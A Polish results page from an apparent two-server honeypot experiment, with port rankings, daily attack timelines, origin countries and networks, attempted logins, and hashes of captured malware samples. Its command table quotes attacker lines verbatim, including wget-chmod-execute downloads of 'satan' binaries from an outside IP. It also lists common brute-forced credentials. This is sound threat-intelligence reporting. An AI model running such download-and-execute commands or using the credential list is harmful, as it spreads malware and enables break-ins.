Przejdź do treści

Eksperyment typu „honeypot”

Wyniki

Statystyki z obu honeypotów. Przy każdym wykresie i tabeli podano przedział czasowy, plik CSV ze źródłowymi danymi oraz skrypt, który obliczył te liczby – aby każdy mógł je samodzielnie przeliczyć.

Dane zaktualizowane: 3. 10. 2026 10:31:16 UTC+02:00

Zgłoś problem

Ranking portów #


Główna tabela eksperymentu: które porty cieszyły się największym zainteresowaniem wśród atakujących. Można sortować według dowolnej kolumny, filtrować według serwera oraz wyszukiwać konkretny port, zakres lub nazwę usługi. Do każdego wiersza można odwołać się, na przykład #port-3389.

W przypadku srv4 uwzględnia się rzeczywisty port docelowy z hptcp. Porty przekierowania (42222, 42223, 42280, 42443) nie są uwzględniane jako porty docelowe.
Port Protokół Standardowa usługa Serwer Eksperymenty Unikalny adres IP Udział
5901 tcp VNC oba serwery 883 864 801 16,1 %
3389 tcp RDP oba serwery 734 148 2 425 13,4 %
3389 tcp RDP srv4 726 599 1 515 18,1 %
5900 tcp VNC oba serwery 707 172 1 343 12,9 %
445 tcp SMB oba serwery 459 930 6 055 8,4 %
5901 tcp VNC srv4 449 586 598 11,2 %
5901 tcp VNC srv3 434 278 655 29,7 %
445 tcp SMB srv3 415 953 5 570 28,4 %
5900 tcp VNC srv4 360 884 1 098 9,0 %
5900 tcp VNC srv3 346 288 1 176 23,7 %
Okno czasowe
21. 8. 2026 – 16. 9. 2026
Dane źródłowe
honeypot-ports-aggregated-20260922.csv
Skrypt
zostanie opublikowany
Format
dokumentacja pól

Zmiany w czasie #


Liczba zdarzeń w czasie, podzielona na kampanie i szum tła, a poniżej liczba unikalnych adresów IP. Jak wynika z dzienników agentów, poszczególne kampanie generowały większość dziennego ruchu. Bez takiego podziału wykres wprowadzałby w błąd: kampania wyglądałaby jak trend, a jej zakończenie jak przerwa w gromadzeniu danych.

To, w jaki sposób kampania oddziela się od szumu tła, określa skrypt podany pod wykresem.

Usuń filtry

Liczba zdarzeń

  • Szum podstawowy
  • Kampanie
0200k400k600k800k22. 8.22. 8. 2026 Szum podstawowy: 22 460 Kampanie: 59 843 W sumie: 82 303 Niepełny okres – dane za 12 h / 24 h23. 8. 2026 Szum podstawowy: 45 099 Kampanie: 34 177 W sumie: 79 27624. 8. 2026 Szum podstawowy: 38 153 Kampanie: 10 775 W sumie: 48 92825. 8.25. 8. 2026 Szum podstawowy: 40 077 Kampanie: 29 825 W sumie: 69 90226. 8. 2026 Szum podstawowy: 40 083 Kampanie: 28 709 W sumie: 68 79227. 8. 2026 Szum podstawowy: 42 664 Kampanie: 161 642 W sumie: 204 30628. 8.28. 8. 2026 Szum podstawowy: 42 779 Kampanie: 159 044 W sumie: 201 82329. 8. 2026 Szum podstawowy: 34 634 Kampanie: 171 641 W sumie: 206 27530. 8. 2026 Szum podstawowy: 37 426 Kampanie: 148 263 W sumie: 185 68931. 8.31. 8. 2026 Szum podstawowy: 35 671 Kampanie: 504 248 W sumie: 539 9191. 9. 2026 Szum podstawowy: 53 935 Kampanie: 666 265 W sumie: 720 2002. 9. 2026 Szum podstawowy: 65 803 Kampanie: 209 955 W sumie: 275 7583. 9.3. 9. 2026 Szum podstawowy: 46 703 Kampanie: 227 972 W sumie: 274 6754. 9. 2026 Szum podstawowy: 51 972 Kampanie: 167 450 W sumie: 219 4225. 9. 2026 Szum podstawowy: 58 392 Kampanie: 95 631 W sumie: 154 0236. 9.6. 9. 2026 Szum podstawowy: 85 408 Kampanie: 46 399 W sumie: 131 8077. 9. 2026 Szum podstawowy: 89 526 Kampanie: 94 877 W sumie: 184 4038. 9. 2026 Szum podstawowy: 109 966 Kampanie: 59 781 W sumie: 169 7479. 9.9. 9. 2026 Szum podstawowy: 128 711 Kampanie: 48 861 W sumie: 177 57210. 9. 2026 Szum podstawowy: 132 528 Kampanie: 60 866 W sumie: 193 39411. 9. 2026 Szum podstawowy: 147 151 Kampanie: 63 267 W sumie: 210 41812. 9.12. 9. 2026 Szum podstawowy: 171 996 Kampanie: 82 831 W sumie: 254 82713. 9. 2026 Szum podstawowy: 131 895 Kampanie: 105 016 W sumie: 236 91114. 9. 2026 Szum podstawowy: 129 805 Kampanie: 83 835 W sumie: 213 64015. 9.15. 9. 2026 Szum podstawowy: 112 933 Kampanie: 159 141 W sumie: 272 07416. 9. 2026 Szum podstawowy: 72 402 Kampanie: 28 713 W sumie: 101 115 Niepełny okres – dane za 12 h / 24 h

Unikalne adresy IP

Liczba różnych adresów IP źródłowych w każdym dniu.

  • srv3
  • srv4
02k4k6ksrv4srv322. 8.25. 8.28. 8.31. 8.3. 9.6. 9.9. 9.12. 9.15. 9.22. 8. 2026 srv3: 547 srv4: 1 870 Niepełny okres – dane za 12 h / 24 h23. 8. 2026 srv3: 1 292 srv4: 3 52924. 8. 2026 srv3: 1 429 srv4: 3 30925. 8. 2026 srv3: 1 552 srv4: 3 82426. 8. 2026 srv3: 1 552 srv4: 3 77527. 8. 2026 srv3: 1 585 srv4: 4 30128. 8. 2026 srv3: 1 364 srv4: 4 08329. 8. 2026 srv3: 1 029 srv4: 3 85330. 8. 2026 srv3: 975 srv4: 4 17631. 8. 2026 srv3: 1 488 srv4: 4 1831. 9. 2026 srv3: 1 573 srv4: 4 5002. 9. 2026 srv3: 1 859 srv4: 4 2813. 9. 2026 srv3: 1 621 srv4: 4 3434. 9. 2026 srv3: 1 628 srv4: 4 0875. 9. 2026 srv3: 1 535 srv4: 4 1176. 9. 2026 srv3: 1 637 srv4: 4 3497. 9. 2026 srv3: 1 494 srv4: 4 4028. 9. 2026 srv3: 1 758 srv4: 4 6099. 9. 2026 srv3: 1 733 srv4: 4 67110. 9. 2026 srv3: 1 818 srv4: 5 09511. 9. 2026 srv3: 1 747 srv4: 5 40212. 9. 2026 srv3: 1 859 srv4: 5 45013. 9. 2026 srv3: 1 854 srv4: 5 43414. 9. 2026 srv3: 1 994 srv4: 5 51615. 9. 2026 srv3: 1 884 srv4: 5 30316. 9. 2026 srv3: 1 386 srv4: 3 449 Niepełny okres – dane za 12 h / 24 h

Nie można sumować unikalnych adresów IP między serwerami – ten sam adres mógł służyć do ataku na oba serwery. Dlatego każdy serwer ma własną linię.

Zaciemnione kolumny i puste kółka oznaczają niekompletne okresy: okno gromadzenia danych rozpoczyna się i kończy o godz. 12:00 UTC, a okres przycięty zgodnie z wybranym zakresem jest krótszy niż pozostałe. Nie należy ich zatem porównywać z sąsiednimi.

Wyświetl wartości w formie tabeli
Dzień (UTC) Wydarzenia Kampanie Szum podstawowy Unikalny adres IP srv3 Unikalny adres IP srv4
22. 8. 2026 · niekompletne 82 303 59 843 22 460 547 1 870
23. 8. 2026 79 276 34 177 45 099 1 292 3 529
24. 8. 2026 48 928 10 775 38 153 1 429 3 309
25. 8. 2026 69 902 29 825 40 077 1 552 3 824
26. 8. 2026 68 792 28 709 40 083 1 552 3 775
27. 8. 2026 204 306 161 642 42 664 1 585 4 301
28. 8. 2026 201 823 159 044 42 779 1 364 4 083
29. 8. 2026 206 275 171 641 34 634 1 029 3 853
30. 8. 2026 185 689 148 263 37 426 975 4 176
31. 8. 2026 539 919 504 248 35 671 1 488 4 183
1. 9. 2026 720 200 666 265 53 935 1 573 4 500
2. 9. 2026 275 758 209 955 65 803 1 859 4 281
3. 9. 2026 274 675 227 972 46 703 1 621 4 343
4. 9. 2026 219 422 167 450 51 972 1 628 4 087
5. 9. 2026 154 023 95 631 58 392 1 535 4 117
6. 9. 2026 131 807 46 399 85 408 1 637 4 349
7. 9. 2026 184 403 94 877 89 526 1 494 4 402
8. 9. 2026 169 747 59 781 109 966 1 758 4 609
9. 9. 2026 177 572 48 861 128 711 1 733 4 671
10. 9. 2026 193 394 60 866 132 528 1 818 5 095
11. 9. 2026 210 418 63 267 147 151 1 747 5 402
12. 9. 2026 254 827 82 831 171 996 1 859 5 450
13. 9. 2026 236 911 105 016 131 895 1 854 5 434
14. 9. 2026 213 640 83 835 129 805 1 994 5 516
15. 9. 2026 272 074 159 141 112 933 1 884 5 303
16. 9. 2026 · niekompletne 101 115 28 713 72 402 1 386 3 449
Okno czasowe
21. 8. 2026 – 16. 9. 2026
Dane źródłowe
timeline-aggregated na razie niedostępne
Skrypt
zostanie opublikowany
Format
dokumentacja pól

Mapa pochodzenia połączeń #


Skąd pochodziły połączenia. Kraj określa się na podstawie rejestracji adresu IP, a nie rzeczywistej lokalizacji atakującego – za adresem może kryć się wynajęty serwer lub zainfekowany komputer w dowolnym miejscu na świecie. Dokładne dane przedstawiono w tabelach poniżej.

Mapa jest generowana przez serwis Datawrapper; podczas jej ładowania przeglądarka łączy się z serwerami tego serwisu. Otwórz mapę osobno

Geografia i sieci #


Skąd pochodził ruch na podstawie geolokalizacji źródłowego adresu IP oraz do jakich autonomicznych systemów (ASN) należą te adresy. Geolokalizacja wskazuje, gdzie adres jest zarejestrowany, a nie gdzie znajduje się osoba atakująca.

Najczęściej wybierane kraje

  1. US 37,6 %2 057 660
  2. DE 22,5 %1 230 744
  3. CN 10,2 %556 778
  4. GB 8,9 %486 870
  5. SC 3,4 %184 746
  6. NL 2,2 %120 671
  7. TN 1,8 %96 601
  8. VN 1,2 %64 512
  9. MX 1,1 %59 561
  10. IN 0,9 %49 705
  11. SG 0,9 %49 368
  12. BR 0,8 %44 530
  13. RU 0,8 %42 439
  14. HK 0,7 %38 439
  15. RO 0,7 %37 368

Największe sieci (ASN)

ASN Sieć Wydarzenia Unikalny adres IP Udział
51167 CONTABO
DE
1 036 962 168 18,9 %
22295 ADVIN
US
924 717 7 16,9 %
36352 AS-COLOCROSSING
US
388 883 131 7,1 %
212238 CDNEXT
GB
385 498 98 7,0 %
396982 GOOGLE-CLOUD-PLATFORM
US
171 392 3 170 3,1 %
14061 DIGITALOCEAN-ASN
US
138 119 2 732 2,5 %
45090 TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited
CN
133 244 114 2,4 %
209334 MODAT-01
NL
114 475 93 2,1 %
197170 TECHTIES-AS - TechTies Inc.
SC
110 821 185 2,0 %
45102 ALIBABA-CN-NET Alibaba US Technology Co., Ltd.
CN
101 319 303 1,8 %
Wyświetl wartości w formie tabeli
Kraj Wydarzenia Unikalny adres IP Udział
US 2 057 660 13 624 37,6 %
DE 1 230 744 1 111 22,5 %
CN 556 778 5 671 10,2 %
GB 486 870 2 870 8,9 %
SC 184 746 319 3,4 %
NL 120 671 174 2,2 %
TN 96 601 94 1,8 %
VN 64 512 644 1,2 %
MX 59 561 281 1,1 %
IN 49 705 850 0,9 %
Okno czasowe
21. 8. 2026 – 16. 9. 2026
Dane źródłowe
geo-aggregated na razie niedostępne
Skrypt
zostanie opublikowany
Format
dokumentacja pól

Dane logowania #


Kombinacje nazw użytkownika i haseł, które sprawdzali atakujący, oraz najczęściej sprawdzane nazwy użytkowników. Wartości są przedstawione dokładnie tak, jak zostały przesłane.

Najczęściej wybierane nazwy użytkownika

  1. root 4 665 haseł43 470
  2. admin 722 haseł10 909
  3. enable\x00 2 haseł2 938
  4. user 216 haseł2 100
  5. sa 83 haseł2 049
  6. support 178 haseł1 551
  7. test 215 haseł1 518
  8. ubuntu 100 haseł1 456
  9. cloud 148 haseł1 281
  10. postgres 93 haseł1 198
  11. batacek 147 haseł1 164
  12. srv 147 haseł1 154
  13. shell\x00 1 haseł965
  14. deploy 66 haseł925
  15. ftp 459 haseł876

Najczęstsze kombinacje

Imię Hasło Eksperymenty Unikalny adres IP
lghkel\x09 zpz}ld\x09 176 12
root 123321 176 52
zalee\x09 za\x09 173 12
root admin123 170 56
root qwerty 170 57
root root123 165 92
root hi3518 161 35
admin 4321 159 18
root P@ssw0rd 159 53
admin 1234 158 114
Okno czasowe
21. 8. 2026 – 16. 9. 2026
Dane źródłowe
credentials-aggregated na razie niedostępne
Skrypt
zostanie opublikowany
Format
dokumentacja pól

Co działo się po zalogowaniu #


Polecenia wprowadzone przez atakujących w emulowanej powłoce, uporządkowane według częstotliwości. Jest to dane wprowadzone przez atakującego, a nie kod, który faktycznie byłby wykonywany na serwerze.

Pierwotny zapis, wyświetlany dokładnie w takiej postaci, w jakiej powstał.
Polecenie Liczba Relacje
wget http://31.77.227.121/satan_sparc; chmod 777 satan_sparc; ./satan_sparc; rm -rf satan_sparc 1 1
wget http://31.77.227.121/satan_x86_64; chmod 777 satan_x86_64; ./satan_x86_64; rm -rf satan_x86_64 1 1
which curl 1 1
which wget 1 1
` 1 1
{ __hp_4b422075; } 2>&1; printf 'EXITCODE:%d\n' $?;printf 'PROC_VER_FULL:%s\n' "$(cat /proc/version 2>/dev/null | head -1)";printf 'UNAME_R:%s\n' "$(uname -r 2>/dev/null)";printf 'UNAME_V:%s\n' "$(uname -v 2>/dev/null)";printf 'UNAME_A:%s\n' "$(uname -a 2>/dev/null)" 1 1
{ __hp_4de9a7bb; } 2>&1; printf 'EXITCODE:%d\n' $?;printf 'PROC_VER_FULL:%s\n' "$(cat /proc/version 2>/dev/null | head -1)";printf 'UNAME_R:%s\n' "$(uname -r 2>/dev/null)";printf 'UNAME_V:%s\n' "$(uname -v 2>/dev/null)";printf 'UNAME_A:%s\n' "$(uname -a 2>/dev/null)" 1 1
{ __hp_16f54dc8; } 2>&1; printf 'EXITCODE:%d\n' $?;printf 'PROC_VER_FULL:%s\n' "$(cat /proc/version 2>/dev/null | head -1)";printf 'UNAME_R:%s\n' "$(uname -r 2>/dev/null)";printf 'UNAME_V:%s\n' "$(uname -v 2>/dev/null)";printf 'UNAME_A:%s\n' "$(uname -a 2>/dev/null)" 1 1
{ __hp_68becace; } 2>&1; printf 'EXITCODE:%d\n' $?;printf 'PROC_VER_FULL:%s\n' "$(cat /proc/version 2>/dev/null | head -1)";printf 'UNAME_R:%s\n' "$(uname -r 2>/dev/null)";printf 'UNAME_V:%s\n' "$(uname -v 2>/dev/null)";printf 'UNAME_A:%s\n' "$(uname -a 2>/dev/null)" 1 1
{ __hp_7566925e; } 2>&1; printf 'EXITCODE:%d\n' $?;printf 'PROC_VER_FULL:%s\n' "$(cat /proc/version 2>/dev/null | head -1)";printf 'UNAME_R:%s\n' "$(uname -r 2>/dev/null)";printf 'UNAME_V:%s\n' "$(uname -v 2>/dev/null)";printf 'UNAME_A:%s\n' "$(uname -a 2>/dev/null)" 1 1
Okno czasowe
21. 8. 2026 – 16. 9. 2026
Dane źródłowe
attacker-commands-aggregated na razie niedostępne
Skrypt
zostanie opublikowany
Format
dokumentacja pól

Pobrane próbki #


Pliki, które atakujący próbowali pobrać lub przesłać, w podziale na typ i architekturę.

Tutaj znajdują się tylko skróty i metadane. Same próbki znajdują się w zarchiwizowanym pliku chronionym hasłem w sekcji Dane

Według typu pliku

  1. PE1 058
  2. ELF58
  3. script39
  4. data35

Zgodnie z architekturą

  1. —1 132
  2. x86_6424
  3. arm11
  4. x864
  5. mips4
  6. mipsel4
  7. aarch643
  8. riscv2
  9. elf-0x5d2
  10. sh1
  11. elf-0x41
  12. ppc1
  13. sparc1
SHA-256 Typ Architektura Rozmiar Po raz pierwszy Uchwycone Wyszukaj
bfb4fc546e7c80572a85cea5828f27621dcefb05a35c06685e43cc67f8d3a48b ELF arm 39,3 KB 23. 8. 2026 16:18:43 1 VirusTotal
9e2e7f57fa1f117b911b741e29fde7a53c047ed34ceb3ccef354db2bb4c38017 ELF mips 54,2 KB 23. 8. 2026 16:18:43 1 VirusTotal
e51c0db804508c31cb85c858eebb684d14d5386ca7ad733b97d460ef763546e7 ELF mipsel 55,9 KB 23. 8. 2026 16:18:43 1 VirusTotal
6f6287e9e363e5457912abb4100053964f28d4d2a0bd3c6046f9035f89022073 ELF arm 48,7 KB 23. 8. 2026 16:18:43 1 VirusTotal
c7cf5a8802506852d057798cfcd862f89af5a48f3239fbb3e905f112987f0cd6 ELF arm 54,3 KB 23. 8. 2026 16:18:43 1 VirusTotal
f2006a57f197a51049224e841ace1bb1eed5de15cceabe20353e76ab4c9e4d6b ELF x86_64 53,2 KB 23. 8. 2026 16:18:43 1 VirusTotal
cb13c93cd04a0a56ed96954ce2bb28e066ab75dfc53d6528a31d317e6a94db62 ELF arm 50,2 KB 23. 8. 2026 16:18:43 1 VirusTotal
7ca3d0773f3689a01feb3c230fe088ed4d5ffd47305c2ad9f7ee30a54737b109 ELF elf-0x5d 105,5 KB 23. 8. 2026 16:18:43 1 VirusTotal
ceecb57e23558def55d714108d1ac39600a3b883dcef912f78ead23e3f6395d9 ELF x86 32,2 KB 23. 8. 2026 16:18:43 1 VirusTotal
529a7184ce91040f0f8731483c04d8ba48457f5a93031fe6a43d5d992284c445 script — 1,6 KB 23. 8. 2026 23:16:47 1 VirusTotal
Okno czasowe
21. 8. 2026 – 16. 9. 2026
Dane źródłowe
samples-aggregated na razie niedostępne
Skrypt
zostanie opublikowany
Format
dokumentacja pól

Porównanie serwerów #


O ile wzrosło obciążenie dzięki większej powierzchni i czym różnią się oba serwery pod względem struktury.

Wartości bezwzględne obu serwerów nie są porównywalne – srv4 oferował powierzchnię o rząd wielkości większą. Sens ma porównywanie struktury i kolejności, a nie wielkości. Więcej
Wskaźnik srv3 srv4 srv4 / srv3
Próby połączenia (lista portów) 1 462 877 4 014 322 2,7×
Porty, których to dotyczy 45 58 628 1 302,8×
Zdarzenia (zmiany w czasie) 1 462 877 4 014 322 2,7×

srv3 najczęściej używane porty

  1. 5901/tcp VNC434 278
  2. 445/tcp SMB415 953
  3. 5900/tcp VNC346 288
  4. 22/tcp SSH77 679
  5. 443/tcp HTTPS25 880
  6. 23/tcp Telnet24 961
  7. 5060/udp SIP22 484
  8. 80/tcp HTTP18 336
  9. 3000/tcp HTTP alt9 322
  10. 3389/tcp RDP7 549

srv4 najczęściej używane porty

  1. 3389/tcp RDP726 599
  2. 5901/tcp VNC449 586
  3. 5900/tcp VNC360 884
  4. 1256/tcp341 276
  5. 8787/tcp340 499
  6. 8082/tcp HTTP alt323 345
  7. 1080/tcp SOCKS270 186
  8. 5800/tcp VNC HTTP159 507
  9. 22/tcp SSH61 829
  10. 445/tcp SMB43 977
Okno czasowe
21. 8. 2026 – 16. 9. 2026
Dane źródłowe
honeypot-ports-aggregated-20260922.csv, timeline-aggregated na razie niedostępne
Skrypt
zostanie opublikowany
Format
dokumentacja pól